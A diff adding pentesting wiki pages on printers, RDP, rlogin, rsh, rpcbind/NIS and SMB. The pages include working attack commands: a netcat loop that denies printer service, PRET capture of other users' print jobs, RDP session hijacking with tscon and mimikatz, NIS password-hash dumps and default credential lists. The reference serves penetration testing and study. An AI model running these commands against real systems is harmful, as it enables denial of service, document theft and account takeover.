+With the capability to hook into arbitrary PostScript operators it is possible to manipulate and access foreign print jobs. To **parse the actual datastream send to the printer**, one can apply a pretty cool feature of the PostScript language: to read its own program code as data using the `currentfile` operator. This way, the whole datastream to be processed by the PostScript interpreter can be accessed by reading and stored to a file on the printer device. If the printer does not offer file system access, **captured documents can be stored in memory**, for example within permanent PostScript dictionaries.   
+One practical problem is to decide **which operator should be hooked** as one does not gain access to the datastream until this operator is processed by the PostScript interpreter. As an attacker wants to capture print jobs from the very beginning, the **redefined operator must be the very first operator** contained in the PostScript document. Fortunately all documents printed with CUPS are pressed into a fixed structure beginning with `currentfile /ASCII85Decode filter /LZWDecode filter cvx exec`. Based on the assumption of such a fixed structure, the attacker can capture documents from the beginning and execute \(aka print\) the file afterwards. For printing systems **other than CUPS** this attack should also be possible, but **operators need to be adapted**. Note that the PostScript header which usually includes media size, user and job names cannot be captured using this method because we first hook into at the beginning of the actual document. Another generic strategy to hook into at the beginning of every print job is to set the `BeginPage` system parameter, if supported by the printer \(most printer do\). This vulnerability has presumably been present in printing devices for decades as solely language constructs defined by the PostScript standard are abused.
+
+Use `capture` command from [**PRET**](https://github.com/RUB-NDS/PRET) in ps mode:
+
+```text
+./pret.py -q printer ps
+Connection to printer established
+
+Welcome to the pret shell. Type help or ? to list commands.
+
+printer:/> capture 
+Print job operations:  capture <operation>
+  capture start   - Record future print jobs.
+  capture stop    - End capturing print jobs.
+  capture list    - Show captured print jobs.
+  capture fetch   - Save captured print jobs.
+  capture print   - Reprint saved print jobs.
+printer:/> capture start
+Future print jobs will be captured in memory!
+printer:/> exit
+```
+
+Now, print arbitrary documents \(make sure PRET is disconnected to not block the printing channel\). Afterwards, you can list, fetch or reprint captured documents:
+
+```text
+./pret.py -q printer ps
+Connection to printer established
+
+Welcome to the pret shell. Type help or ? to list commands.
+printer:/> capture list
+Free virtual memory: 16.6M | Limit to capture:  5.0M
+date          size  user           jobname                 creator             
+───────────────────────────────────────────────────────────────────────────────
+Jan 25 18:38  3.1M  -              -                       -                   
+Jan 25 18:40  170K  -              -                       -                   
+printer:/> capture fetch
+Receiving capture/printer/690782792
+3239748 bytes received. 
+Receiving capture/printer/690646210
+174037 bytes received.
+printer:/> capture print
+printing...
+printing...
+2 jobs reprinted
+printer:/> capture stop
+Stopping job capture, deleting recorded jobs
+```
+
diff --git a/pentesting/pentesting-printers/scanner-and-fax.md b/pentesting/pentesting-printers/scanner-and-fax.md
new file mode 100644
index 00000000..2fcbf19c
--- /dev/null
+++ b/pentesting/pentesting-printers/scanner-and-fax.md
@@ -0,0 +1,55 @@
+---
+description: 'From http://hacking-printers.net/wiki/index.php/Fax_and_Scanner'
+---
+
+# Scanner and Fax
+
+## Scanner
+
+Access to scan functionality on MFPs \(multi-function printers/peripherals\) is not standardized and it seems only few vendors apply PJL commands for this task. Public documentation is missing, the [SANE project](http://www.sane-project.org/sane-backends.html#SCANNERS) managed to reverse engineer the protocols for various scanner devices. On Brother MFPs, the proprietary PostScript operator \_brpdfscan may possibly be used.
+
+**How to test for this attack?**
+
+Install the printer drivers for the specific model and \(ab\)use the scan function.
+
+**Who can perform this attack?**
+
+* Anyone who can print, if scanning functionality can be accessed through a [printer control](http://hacking-printers.net/wiki/index.php/Fundamentals#Printer_Control_Languages) or [page description](http://hacking-printers.net/wiki/index.php/Fundamentals#Page_Description_Languages) language
+* Anyone who can access the web interface, on MFPs where documents can be scanned using the web interface
+* Only attackers who can access certain network services, if a separate TCP port is used for scanning
+
+## Telefax
+
+Fax messages are transmitted in the form of audio-frequency tones. They can be sent to any telefax-capable device available over the telephone system. Therefore, they could potentially be used to bypass typical company protection mechanisms like TCP/IP firewalls or intrusion detection systems and execute malicious commands on printers or MFPs in internal networks. In the middle of 90s Adobe introduced ‘PostScript fax’ as a language supplement [\[1\]](http://hacking-printers.net/wiki/index.php/Fax_and_Scanner#cite_note-1), allowing compatible devices to receive PostScript files directly via fax. This enables an attacker to use ordinary telephone system as a channel to deploy malicious PostScript code to a printer. Unfortunately, PostScript fax never established itself and was only implemented in a handful of devices. Telefax messages instead are typically transmitted as graphical images like [TIFF](https://en.wikipedia.org/wiki/TIFF#TIFF_Compression_Tag). Nevertheless, it cannot be ruled out that other vendors implement proprietary fax extensions to **inbound** receive arbitrary PDL datastreams instead of raw fax images. Theoretically, a ‘fax virus’ could be created which would spread by infecting other devices based on numbers from the MFPs's address book or by traditional wardialing.
+
+Furthermore, **outbound** fax can often be controlled by proprietary PJL commands on today's MFPs. This can be used to cause financial loss to an institution by calling an 0900 number \(which may be registered by the attacker herself\) or as a backchannel to leak sensitive information. Vendor-specific examples to send fax via PDL datastreams are given below.
+
+#### HP
+
+According to [\[1\]](http://hplipopensource.com/) fax can be accessed using PML on HP devices.
+
+#### Xerox
+
+According to [\[2\]](http://www.office.xerox.com/support/dctips/dc02cc0280.pdf), Xerox uses proprietary PJL commands: `@PJL COMMENT OID_ATT_FAX_DESTINATION_PHONE "..."`
+
+#### Brother
+
+According to [\[3\]](http://brother-mfc.sourceforge.net/faxlanguage.txt), Brother uses the proprietary FCL \(Fax Control Language\): `<Esc>DIALNUM[ (...) ]`
+
+#### Lexmark
+
+According to [\[4\]](https://www.lexmark.com/publications/pdfs/techref_WB.pdf) Lexmark uses proprietary PJL commands: `@PJL LFAX PHONENUMBER="..."`
+
+#### Kyocera
+
+According to [\[5\]](http://material.karlov.mff.cuni.cz/people/hajek/bizhub/femperonpsc200mu.pl) Kyocera uses proprietary PJL commands: `@PJL SET FAXTEL = ...`
+
+#### Ricoh
+
+Accroding to [\[6\]](http://www.objectiflune.com/forum2/ubbthreads.php?ubb=showflat&Number=29462&page=1) Ricoh uses proprietary PJL commands: `@PJL ENTER LANGUAGE=RFAX`
+
+  
+**How to test for this attack?**
+
+Install the printer drivers for the specific model and \(ab\)use the fax function.
+
diff --git a/pentesting/pentesting-printers/software-packages.md b/pentesting/pentesting-printers/software-packages.md
new file mode 100644
index 00000000..fbc0a1db
--- /dev/null
+++ b/pentesting/pentesting-printers/software-packages.md
@@ -0,0 +1,87 @@
+---
+description: 'Info from http://hacking-printers.net/wiki/index.php/Software_packages'
+---
+
+# Software packages
+
+In the recent years, printer vendors have started to introduce the **possibility to install custom software on their devices**. The format of such ‘printer apps’ is proprietary and SDKs are not available to the public. The feature of writing customized software which runs on printers was intended and is reserved for resellers and contractors, not for end-users. Hereby a printer fleet can be adapted to the special needs and business processes of a company; document solution providers can easily integrate printers into their management software. One popular example is NSi AutoStore [\[1\]](http://hacking-printers.net/wiki/index.php/Software_packages#cite_note-1) which can be installed on many MFPs and automatically uploads scanned or copied documents to predefined locations. Obviously, the feature to run custom code on a printer device is a potential security threat. Furthermore code signing of software packages is potentially harder than it is for [firmware](http://hacking-printers.net/wiki/index.php/Firmware_updates) as software is not only written by the printer manufacturer but by a broader range of developers who need to be in possession of the secret key to sign their software. Therefore it is logical to include the secret key in SDKs which are protected by being exclusively available from developer platforms. This article is an effort to systematically gather information on vendor-specific software platforms/SDKs.
+
+## Vendors
+
+In the following a rough outline on the software platforms provided by major printer vendors to extend functionality of their devices is given.
+
+### HP \(Chai/OXP\)
+
+HP introduced their ‘Chai Appliance Platform’ platform in 1999 to run Java applications on LaserJet printers. While an SDK had been open to the public at first [\[2\]](http://hacking-printers.net/wiki/index.php/Software_packages#cite_note-2), access was later restricted to members of HP's developer network. Chai servlets which come as `.jar` files which originally needed to be certified and signed by HP before they would be accepted by a printer device. [\[3\]](http://hacking-printers.net/wiki/index.php/Software_packages#cite_note-phenoelit2002embedded-3) discovered a flaw in the deployment process: by installing EZloader – an alternative loader software provided by HP which had already been signed – they were able to upload and run their own, unsigned Java packages. As it seems, code signing was completely dropped by HP for later Chai versions: [\[4\]](http://hacking-printers.net/wiki/index.php/Software_packages#cite_note-mueller2016printers-4) were able to write and execute a proof-of-concept printer malware which listens on port 9100 and uploads incoming documents to an FTP server before printing them. Their code is based on [\[5\]](http://hacking-printers.net/wiki/index.php/Software_packages#cite_note-5) who extended the device to support load-balancing and included the required SDK files and proprietary Java libraries in their demonstration. With the libraries, arbitrary Java code can be complied and executed on older HP LaserJets by uploading the `.jar` files to a ‘hidden’ URL: [`http://printer/hp/device/this.loader`](http://printer/hp/device/this.loader). This attack can be carried out if no password has yet been set for the embedded web server. Otherwise, the password must first be retrieved from `/dev/rdsk_jdi_cfg0` with PostScript \(see [file system access](http://hacking-printers.net/wiki/index.php/File_system_access)\) or bypassed by resetting the device to [factory defaults](http://hacking-printers.net/wiki/index.php/Factory_defaults). A web attacker can upload the `.jar` file using [CSRF](https://en.wikipedia.org/wiki/Cross-site_request_forgery) if the victim is currently logged into the printer's embedded web server. For newer devices, HP uses the web services based ‘Open Extensibility Platform’ \([OXP](https://developers.hp.com/oxp/)\) instead of Chai for which no SDK is publicly available.
+
+### Canon \(MEAP\)
+
+The ‘Multifunctional Embedded Application Platform’ \([MEAP](http://www.developersupport.canon.com/faq/335#t335n18)\) is a Java-based software platform introduced by Canon in 2003 for their imageRunner series and extended to web services in 2010. Third party developers can obtain the MEAP [SDK](http://developersupport.canon.com/content/meap-sdk-0) for a fee of $5,000 which is certainly out of scope for research purposes.
+
+### Xerox/Dell \(EIP\)
+
+The ‘Extensible Interface Platform’ \([EIP](http://www.office.xerox.com/eip/enus.html)\) [\[6\]](http://hacking-printers.net/wiki/index.php/Software_packages#cite_note-6) was announced in 2006 by Xerox for various MFPs. The architecture – which is also supported by a few rebadged Dell devices – is based on web services technology. The [SDK](http://www.office.xerox.com/eip/enus.html) is freely available for registered developers.
+
+### Brother \(BSI\)
+
+The ‘Brother Solutions Interface’ \([BSI](https://www.brother-usa.com/lp/civ/bsi.aspx)\) is an XML-based web architecture launched in 2012 for scanners, copiers and printers. Access to the [SDK](https://www.brother-usa.com/lp/civ/home.aspx) is available to licensed developers.
+
+### Lexmark \(eSF\)
+
+The ‘Embedded Solution Framework’ \([eSF](http://www.lexmark-emea.com/usa/BSD_solution_catalouge.pdf)\) was launched in 2006 for Lexmark MFPs. The SDK to develop Java applications is reserved for ‘specially qualified partners’. According to [\[7\]](http://hacking-printers.net/wiki/index.php/Software_packages#cite_note-7) ‘these applications must be digitally signed by Lexmark before being adopted’ using 2048-bit RSA signatures.
+
+### Samsung \(XOA\)
+
+The ‘eXtensible Open Architecture’ \([XOA](http://samsungprintingsolutions.com/2015/02/can-samsungs-extensible-open-architecture-xoa/)\) was introduced by Samsung in 2008 and comes in two flavours: the XOA-E Java virtual machine and the web services based XOA-Web. The [SDK](http://xoapartnerportal.com/) is only available to Samsung resellers.
+
+### Ricoh \(ESA\)
+
+The ‘Embedded Software Architecture’ \([ESA](https://www.ricoh.com/esa/)\) [\[8\]](http://hacking-printers.net/wiki/index.php/Software_packages#cite_note-8) was launched by Ricoh in 2004. The Java based [SDK/J](http://www.ricoh-developer.com/content/device-sdk-type-j-sdkj-overview) is available to developers after a registration.
+
+### Kyocera/Utax \(HyPAS\)
+
+The ‘Hybrid Platform for Advanced Solutions’ \([HyPAS](http://usa.kyoceradocumentsolutions.com/americas/jsp/Kyocera/hypas_overview.jsp)\) [\[9\]](http://hacking-printers.net/wiki/index.php/Software_packages#cite_note-9) has been released by Kyocera in 2008. Applications are based either on Java or on web services. The [SDK](https://www.kyoceradocumentsolutions.eu/index/document_solutions/HyPAS/hypas_developer_partner.html) is only available for members of the ‘HyPAS Development Partner Programme’ and applications have to be approved by Kyocera.
+
+### Konica Minolta \(bEST\)
+
+The ‘bizhub Extended Solution Technology’ \([bEST](https://best.kmbs.us/)\) [\[10\]](http://hacking-printers.net/wiki/index.php/Software_packages#cite_note-10) which is based on web services was introduced by Konica Minolta in 2009. Access to the [SDK](https://best.kmbs.us/pages/levels.php) requires ‘platinum membership level’ in the developer program for a fee of $4,000 which is out of scope for independent researchers.
+
+### Toshiba \(e-BRIDGE\)
+
+The ‘e-BRIDGE Open Platform’ \([e-BRIDGE](http://www.estudio.com.sg/solutions_ebridge.aspx)\) was released by Toshiba in 2008 to customize their high-end MFPs based on web services technology. An SDK is not available to the general public.
+
+### Sharp \(OSA\)
+
+The ‘Open Systems Architecture’ \([OSA](http://siica.sharpusa.com/Document-Systems/Sharp-OSA)\) [\[11\]](http://hacking-printers.net/wiki/index.php/Software_packages#cite_note-11) was announced by Sharp in 2004. The [SDK](http://sharp-partners.com/us/PartnerPrograms/DeveloperProgram/tabid/722/Default.aspx) used to develop web services is fee-based and applications need to be validated by Sharp before they can be installed on an MFP.
+
+### Oki \(sXP\)
+
+The ‘smart eXtendable Platform’ \([sXP](http://www.oki.com/en/press/2014/09/z14053e.html)\) [\[12\]](http://hacking-printers.net/wiki/index.php/Software_packages#cite_note-12) which is based on web services was launched by Oki Data in 2013 for their MFP devices. Oki does not publish any information regarding an official developer program or publicly available SDK.
+
+## Results
+
+On older HP laser printers, arbitrary Java bytecode can be executed as demonstrated by [\[3\]](http://hacking-printers.net/wiki/index.php/Software_packages#cite_note-phenoelit2002embedded-3) and [\[4\]](http://hacking-printers.net/wiki/index.php/Software_packages#cite_note-mueller2016printers-4). Security is based on the password of the embedded web server which can be easily retrieved with PostScript or bypassed by restoring factory defaults. It is hard to make a reasoned statement on the security of other software platforms because of lacking access to the SDK and/or proper technical documentation. A comparison of platforms, applied technologies and – where known – software package deployment procedures is given below:
+
+| Vendor | Platform | Embedded Java | Web services | Deployment |
+| :--- | :--- | :--- | :--- | :--- |
+| HP | Chai/OXP | ✔ | ✔ | web server |
+| Xerox/Dell | EIP |  | ✔ | unknown |
+| Canon | MEAP | ✔ | ✔ | unknown |
+| Brother | BSI |  | ✔ | unknown |
+| Lexmark | eSF | ✔ |  | unknown |
+| Samsung | XOA | ✔ | ✔ | web server |
+| Ricoh | ESA | ✔ |  | unknown |
+| Kyocera/Utax | HyPAS | ✔ | ✔ | USB drive |
+| Konica Minolta | bEST |  | ✔ | unknown |
+| Toshiba | e-Bridge |  | ✔ | unknown |
+| Sharp | OSA |  | ✔ | unknown |
+| Oki | sXP |  | ✔ | unknown |
+
+### **How to test for this attack?**
+
+Obtain an SDK and write your own proof-of-concept application or find a ‘printer app’ which already does what you want \(for example, automatically upload scanned documents to FTP\). Also check which protection mechanisms exist to install custom software on the device.
+
+### **Who can perform this attack?**
+
+Depended on how software packages are deployed.
+
diff --git a/pentesting/pentesting-printers/transmission-channel.md b/pentesting/pentesting-printers/transmission-channel.md
new file mode 100644
index 00000000..341ad569
--- /dev/null
+++ b/pentesting/pentesting-printers/transmission-channel.md
@@ -0,0 +1,38 @@
+# Transmission channel
+
+If print jobs are processed in series – which is assumed for most devices – only one job can be handled at a time. If this job does not terminate the printing channel effectively is blocked until a timeout is triggered, preventing legitimate users from printing. 
+
+Basic DoS:
+
+```bash
+while true; do nc printer 9100; done
+```
+
+This trivial denial of service attack can be improved by **setting a high timeout value with PJL**, then the number of connections for an attacker to make is minimized while it is even harder for legitimate users to gain a free time slot:
+
+```bash
+# get maximum timeout value with PJL
+MAX="`echo "@PJL INFO VARIABLES" | nc -w3 printer 9100 |\
+  grep -E -A2 '^TIMEOUT=' | tail -n1 | awk '{print $1}'`"
+# connect and set maximum timeout for current job with PJL
+while true; do echo "@PJL SET TIMEOUT=$MAX" | nc printer 9100; done
+```
+
+You can use [PRET](https://github.com/RUB-NDS/PRET) to find the timeout settings:
+
+```bash
+./pret.py -q printer pjl
+Connection to printer established
+
+Welcome to the pret shell. Type help or ? to list commands.
+printer:/> env timeout
+TIMEOUT=15 [2 RANGE]
+       5
+       300
+```
+
+While the PJL reference specifies a maximum timeout of 300 seconds, in practice maximum PJL timeouts may range from 15 to 2147483 seconds.  
+Note that even print jobs received from other printing channels like IPP or LPD are not processed anymore as long as the connection is kept open.
+
+**Learn more about this attack in** [**http://hacking-printers.net/wiki/index.php/Transmission\_channel**](http://hacking-printers.net/wiki/index.php/Transmission_channel)\*\*\*\*
+
diff --git a/pentesting/pentesting-rdp.md b/pentesting/pentesting-rdp.md
new file mode 100644
index 00000000..015cda96
--- /dev/null
+++ b/pentesting/pentesting-rdp.md
@@ -0,0 +1,97 @@
+# 3389 - Pentesting RDP
+
+## Basic Information
+
+**Remote Desktop** Protocol \(**RDP**\) is a proprietary protocol developed by Microsoft, which provides a user with a graphical interface to connect to another computer over a network connection. The user employs **RDP** client software for this purpose, while the other computer must run **RDP** server software \(from [here](https://en.wikipedia.org/wiki/Remote_Desktop_Protocol)\).
+
+**Default port:** 3389
+
+```text
+PORT     STATE SERVICE
+3389/tcp open  ms-wbt-server
+```
+
+## Connect with known credentials/hash
+
+```bash
+rdesktop -u <username> <IP>
+rdesktop -d <domain> -u <username> -p <password> <IP>
+xfreerdp /u:[domain\]<username> /p:<password> /v:<IP>
+xfreerdp /u:[domain\]<username> /pth:<hash> /v:<IP>
+```
+
+### [Brute force](../brute-force.md#rdp) 
+
+**Be careful, you could lock accounts**
+
+## Check known credentials against RDP services
+
+rdp\_check.py from impacket let you check if some credentials are valid for a RDP service:
+
+```bash
+rdp_check <domain>\<name>:<password>@<IP>
+```
+
+## Nmap scripts
+
+```bash
+nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 <IP>
+```
+
+It checks the available encryption and DoS vulnerability \(without causing DoS to the service\) and obtains NTLM Windows info \(versions\).
+
+## Post-Exploitation
+
+{% embed url="https://github.com/JoelGMSec/AutoRDPwn" %}
+
+### Launch CMD with other cretentials so they are used in the network
+
+You can launch a new cmd to wich new credentials will be attached so, every interaction this new shell makes with the network will use the new credentials:
+
+```bash
+runas /netonly /user:<DOMAIN>\<NAME> "cmd.exe" #The password will be prompted
+```
+
+## Session stealing
+
+With Administrator rights you can access any opened RDP session by any user without need to know the password of the owner.
+
+**Get openned sessions:**
+
+```text
+query user
+```
+
+**Access to the selected session**
+
+```bash
+tscon <ID> /dest:<SESSIONNAME>
+```
+
+Now you will be inside the selected RDP session and you will have impersonate a user using only Windows tools and features. 
+
+**Important**: When you access an active RDP sessions you will kickoff the user that was using it.
+
+You could get passwords from the process dumping it, but this method is much faster and led you interact with the virtual desktops of the user \(passwords in notepad without been saved in disk, other RDP sessions opened in other machines...\)
+
+#### **Mimikatz**
+
+You could also use mimikatz to do this:
+
+```bash
+ts::sessions        #Get sessions
+ts::remote /id:2    #Connect to the session
+```
+
+#### Sticky-keys & Utilman
+
+Combining this technique with **stickykeys** or **utilman you will be able to access a administrative CMD and any RDP session anytime**
+
+You can search RDPs that have been backdoored with one of these techniques already with: [https://github.com/linuz/Sticky-Keys-Slayer](https://github.com/linuz/Sticky-Keys-Slayer)
+
+## Adding User to RDP group
+
+```bash
+net localgroup "Remote Desktop Users" UserLoginName /add
+```
+
diff --git a/pentesting/pentesting-rlogin.md b/pentesting/pentesting-rlogin.md
new file mode 100644
index 00000000..a0554d5a
--- /dev/null
+++ b/pentesting/pentesting-rlogin.md
@@ -0,0 +1,33 @@
+# 513 - Pentesting Rlogin
+
+## Basic Information
+
+This service was mostly used in the old days for remote administration but now because of security issues this service has been replaced by the slogin and the ssh.
+
+**Default port:** 513
+
+```text
+PORT    STATE SERVICE
+513/tcp open  login
+```
+
+## **Login**
+
+```text
+apt-get install rsh-client
+```
+
+This command will try to **login** to the remote host by using the login name **root** \(for this service **you don't need to know any password**\):
+
+```
+rlogin <IP> -l <username>
+```
+
+### [Brute force](../brute-force.md#rlogin)
+
+## Find files
+
+```text
+find / -name .rhosts
+```
+
diff --git a/pentesting/pentesting-rpcbind.md b/pentesting/pentesting-rpcbind.md
new file mode 100644
index 00000000..e65d8730
--- /dev/null
+++ b/pentesting/pentesting-rpcbind.md
@@ -0,0 +1,80 @@
+# 111/TCP/UDP - Pentesting Portmapper
+
+## Basic Information
+
+Provides information between Unix based systems. Port is often probed, it can be used to fingerprint the Nix OS, and to obtain information about available services. Port used with NFS, NIS, or any rpc-based service.
+
+**Default port:** 111/TCP/UDP, 32771 in Oracle Solaris
+
+```text
+PORT    STATE SERVICE
+111/tcp open  rpcbind
+```
+
+## Enumeration
+
+```text
+rpcinfo irked.htb
+nmap -sSUC -p111 192.168.10.1
+```
+
+Sometimes it doesn't give you any information, in other occasions you will get something like this:  
+
+![](../.gitbook/assets/image%20%2863%29.png)
+
+### Shodan
+
+* `port:111 portmap`
+
+## RPCBind + NFS
+
+If you find the service NFS then probably you will be able to list and download\(and maybe upload\) files:
+
+![](../.gitbook/assets/image%20%28103%29.png)
+
+Read[ 2049 - Pentesting NFS service](nfs-service-pentesting.md) to learn more about how to test this protocol.
+
+## NIS
+
+If you find the service `ypbind`running:
+
+![](../.gitbook/assets/image%20%28313%29.png)
+
+You can try to exploit it. Anyway, first of all you will **need to guess the NIS "domain name"** of the machine \(when NIS is installed it's configured a "domain name"\) and **without knowing this domain name you cannot do anything**.
+
+
Upon obtaining the NIS domain name for the environment \(example.org in this case\), use the ypwhich command to ping the NIS server and ypcat to obtain sensitive material. You should feed encrypted password hashes into John the Ripper, and once cracked, you can use it to evaluate system access and privileges.
+
+```bash
+root@kali:~# apt-get install nis
+root@kali:~# ypwhich -d example.org 192.168.10.1
+potatohead.example.org
+root@kali:~# ypcat –d example.org –h 192.168.10.1 passwd.byname
+tiff:noR7Bk6FdgcZg:218:101::/export/home/tiff:/bin/bash 
+katykat:d.K5tGUWCJfQM:2099:102::/export/home/katykat:/bin/bash 
+james:i0na7pfgtxi42:332:100::/export/home/james:/bin/tcsh 
+florent:nUNzkxYF0Hbmk:199:100::/export/home/florent:/bin/csh 
+dave:pzg1026SzQlwc:182:100::/export/home/dave:/bin/bash 
+yumi:ZEadZ3ZaW4v9.:1377:160::/export/home/yumi:/bin/bash
+```
+
+| **Master file** | **Map\(s\)** | **Notes** |
+| :--- | :--- | :--- |
+| /etc/hosts | hosts.byname, hosts.byaddr | Contains hostnames and IP details |
+| /etc/passwd | passwd.byname, passwd.byuid | NIS user password file |
+| /etc/group | group.byname, group.bygid | NIS group file |
+| /usr/lib/aliases | mail.aliases | Details mail aliases |
+
+## RPC Users
+
+If you find the **rusersd** service listed like this:
+
+![](../.gitbook/assets/image%20%2814%29.png)
+
+You could enumerate users of the box. To learn how read [1026 - Pentesting Rsusersd](1026-pentesting-rusersd.md).
+
+## Bypass Filtered Portmapper port
+
+If during a nmap scan you see open ports like NFS but the port 111 is filtered, you won't be able to exploit those ports.  
+But, if you can simulate a locally a portmapper service and you tunnel the NFS port from your machine to the victim one, you will be able to use regular tools to exploit those services.  
+More information in [https://medium.com/@sebnemK/how-to-bypass-filtered-portmapper-port-111-27cee52416bc](https://medium.com/@sebnemK/how-to-bypass-filtered-portmapper-port-111-27cee52416bc)
+
diff --git a/pentesting/pentesting-rsh.md b/pentesting/pentesting-rsh.md
new file mode 100644
index 00000000..f787b851
--- /dev/null
+++ b/pentesting/pentesting-rsh.md
@@ -0,0 +1,23 @@
+# 514 - Pentesting Rsh
+
+## Basic Information
+
+**Rsh** use **.rhosts** files and **/etc/hosts.equiv** for authentication. These methods relied on IP addresses and DNS \(Domain Name System\) for authentication. However, spoofing IP addresses is fairly easy, especially if the attacker is on the local network.
+
+Furthermore, the **.rhosts** files were stored in users' home directories, which were typically stored on NFS \(Network File System\) volumes. \(from here: [https://www.ssh.com/ssh/rsh](https://www.ssh.com/ssh/rsh)\).
+
+**Default port**: 514
+
+## Login
+
+```text
+rsh <IP> <Command>
+rsh <IP> -l domain\user <Command>
+rsh domain/user@<IP> <Command>
+rsh domain\\user@<IP> <Command>
+```
+
+### [**Brute Force**](../brute-force.md#rsh)\*\*\*\*
+
+
+
diff --git a/pentesting/pentesting-smb.md b/pentesting/pentesting-smb.md
new file mode 100644
index 00000000..34bd4bce
--- /dev/null
+++ b/pentesting/pentesting-smb.md
@@ -0,0 +1,326 @@
+# 139,445 - Pentesting SMB
+
+## **Port 139**
+
+**NetBIOS** stands for _Network Basic Input Output System_. It is a software protocol that allows applications, PCs, and Desktops on a local area network \(LAN\) to communicate with network hardware and to transmit data across the network. Software applications that run on a NetBIOS network locate and identify each other via their NetBIOS names. A NetBIOS name is up to 16 characters long and usually, separate from the computer name. Two applications start a NetBIOS session when one \(the client\) sends a command to “call” another client \(the server\) over **TCP Port 139**. \(extracted from [here](https://www.thewindowsclub.com/smb-port-what-is-port-445-port-139-used-for)\)
+
+```text
+139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
+```
+
+## Port 445
+
+While Port 139 is known technically as ‘NBT over IP’, Port 445 is ‘SMB over IP’. **SMB** stands for ‘**Server Message Blocks**’. Server Message Block in modern language is also known as **Common Internet File System**. The system operates as an application-layer network protocol primarily used for offering shared access to files, printers, serial ports, and other sorts of communications between nodes on a network.
+
+For instance, on Windows, SMB can run directly over TCP/IP without the need for NetBIOS over TCP/IP. This will use, as you point out, port 445. On other systems, you’ll find services and applications using port 139. This means that SMB is running with NetBIOS over TCP/IP**.** \(extracted from [here](https://www.thewindowsclub.com/smb-port-what-is-port-445-port-139-used-for)\)
+
+```text
+445/tcp   open  microsoft-ds  Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
+```
+
+### IPC$ share
+
+From book _**Network Security Assessment 3rd edition**_
+
+With an anonymous null session you can access the IPC$ share and interact with services exposed via named pipes. The enum4linux utility within Kali Linux is particularly useful; with it, you can obtain the following:
+
+* Operating system information
+* Details of the parent domain
+* A list of local users and groups
+* Details of available SMB shares
+* The effective system security policy
+
+## What is NTLM
+
+If you don't know what is NTLM or you want to know how it works and how to abuse it, you will find very insteresting this page about [**NTLM** where is explained **how this protocol works and how you can take advantage of it**](../windows/ntlm/).
+
+## **Enumeration**
+
+### **Scan** a network searching for hosts:
+
+```bash
+nbtscan -r 192.168.0.1/24
+```
+
+### SMB server version
+
+To look for possible exploits to the SMB version it important to know which version is being used. If this information does not appear in other used tools, you can:  
+- Use the **MSF** auxiliary module _**auxiliary/scanner/smb/smb\_version**  
+- ****_Or **this script**:
+
+```bash
+#!/bin/sh
+#Author: rewardone
+#Description:
+# Requires root or enough permissions to use tcpdump
+# Will listen for the first 7 packets of a null login
+# and grab the SMB Version
+#Notes:
+# Will sometimes not capture or will print multiple
+# lines. May need to run a second time for success.
+if [ -z $1 ]; then echo "Usage: ./smbver.sh RHOST {RPORT}" && exit; else rhost=$1; fi
+if [ ! -z $2 ]; then rport=$2; else rport=139; fi
+tcpdump -s0 -n -i tap0 src $rhost and port $rport -A -c 7 2>/dev/null | grep -i "samba\|s.a.m" | tr -d '.' | grep -oP 'UnixSamba.*[0-9a-z]' | tr -d '\n' & echo -n "$rhost: " &
+echo "exit" | smbclient -L $rhost 1>/dev/null 2>/dev/null
+echo "" && sleep .1
+```
+
+### **Search exploit**
+
+```bash
+msf> search type:exploit platform:windows target:2008 smb
+searchsploit microsoft smb
+```
+
+### **Possible** Credentials
+
+| **Username\(s\)** | **Common passwords** |
+| :--- | :--- |
+| _\(blank\)_ | _\(blank\)_ |
+| guest | _\(blank\)_ |
+| Administrator, admin | _\(blank\)_, password, administrator, admin |
+| arcserve | arcserve, backup |
+| tivoli, tmersrvd | tivoli, tmersrvd, admin |
+| backupexec, backup | backupexec, backup, arcada |
+| test, lab, demo | password, test, lab, demo |
+
+### Obtain information
+
+```bash
+#Dump interesting information
+enum4linux -a [-u "<username>" -p "<passwd>"] <IP>
+nmap --script "safe or smb-enum-*" -p 445 <IP>
+
+#Connect to the rpc
+rpcclient -U "" -N <IP> #No creds
+rpcclient -U "username" [--pw-nt-hash] <IP> #Ask for password/NT hash
+#You can use querydispinfo and enumdomusers to query user information
+
+#Dump user information
+/usr/share/doc/python3-impacket/examples/samrdump.py -port 139 [[domain/]username[:password]@]<targetName or address>
+/usr/share/doc/python3-impacket/examples/samrdump.py -port 445 [[domain/]username[:password]@]<targetName or address>
+
+#Map possible RPC endpoints
+/usr/share/doc/python3-impacket/examples/rpcdump.py -port 135 [[domain/]username[:password]@]<targetName or address>
+/usr/share/doc/python3-impacket/examples/rpcdump.py -port 139 [[domain/]username[:password]@]<targetName or address>
+/usr/share/doc/python3-impacket/examples/rpcdump.py -port 445 [[domain/]username[:password]@]<targetName or address>
+```
+
+### **Enumerating LSARPC and SAMR rpcclient**
+
+**Pat of this section was extracted from book "**_**Network Security Assesment 3rd Edition**_**"**
+
+You can use the Samba **`rpcclient`** utility to interact with **RPC endpoints via named pipes**. The following lists commands that you can issue to SAMR, LSARPC, and LSARPC-DS interfaces upon **establishing** a **SMB session** \(often requiring credentials\).
+
+#### Users enumeration
+
+* **List users**: `querydispinfo` and `enumdomusers`
+* **Get user details**: `queryuser <0xrid>`
+* **Get user groups**: `queryusergroups <0xrid>`
+* **GET SID of a user**: `lookupnames <username>`
+* **Get users aliases**: `queryuseraliases [builtin|domain] <sid>`
+
+#### Groups enumeration
+
+* **List groups**: `enumdomgroups`
+* **Get group details**: `querygroup <0xrid>`
+* **Get group members**: `querygroupmem <0xrid>`
+
+#### Aliasgroups enumeration
+
+* **List alias**: `enumalsgroups <builtin|domain>`
+* **Get members**: `queryaliasmem builtin|domain <0xrid>`
+
+#### Domains enumeration
+
+* **List domains**: `enumdomains`
+* **Get SID**: `lsaquery`
+* **Domain info**: `querydominfo`
+
+#### More SIDs
+
+* **Find SIDs by name**: `lookupnames <username>`
+* **Find more SIDs**: `lsaenumsid`
+* **RID cycling \(check more SIDs\)**: `lookupsids <sid>`
+
+| **Command** | **Interface** | **Description** |
+| :--- | :--- | :--- |
+| queryuser | SAMR | Retrieve user information |
+| querygroup | Retrieve group information |  |
+| querydominfo | Retrieve domain information |  |
+| enumdomusers | Enumerate domain users |  |
+| enumdomgroups | Enumerate domain groups |  |
+| createdomuser | Create a domain user |  |
+| deletedomuser | Delete a domain user |  |
